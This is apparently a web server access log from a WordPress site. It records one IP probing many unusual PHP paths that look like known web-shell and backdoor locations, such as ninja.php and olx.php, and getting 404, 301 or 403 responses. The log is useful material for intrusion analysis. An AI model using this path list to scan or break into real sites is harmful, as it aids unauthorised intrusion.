206.189.39.21 - - [31/Mar/2025:10:58:03 -0400] "GET /wp-includes/js/crop/uword.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:58:04 -0400] "GET /wp-content/themes/bltm/wp-login.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:58:10 -0400] "GET /autoload_classmap.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:58:15 -0400] "GET /wp-content/uploads/2014/07/olx.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
198.54.114.83 - - [31/Mar/2025:10:58:19 -0400] "POST /wp-cron.php?doing_wp_cron=1743433098.9541718959808349609375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
206.189.39.21 - - [31/Mar/2025:10:58:18 -0400] "GET /wp-admin/css/colors/midnight/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:58:19 -0400] "GET /wp-admin/css/colors/midnight/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:58:22 -0400] "GET /wp-content/uploads/2020/wp-couldent.php.suspected HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:58:26 -0400] "GET /wp-content/plugins/523453244/ninja.php HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:58:30 -0400] "GET /wp-includes/js/imgareaselect/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:58:31 -0400] "GET /wp-includes/js/imgareaselect/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
206.189.39.21 - - [31/Mar/2025:10:58:36 -0400] "GET /wp-includes/PHPMailer/load.php HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
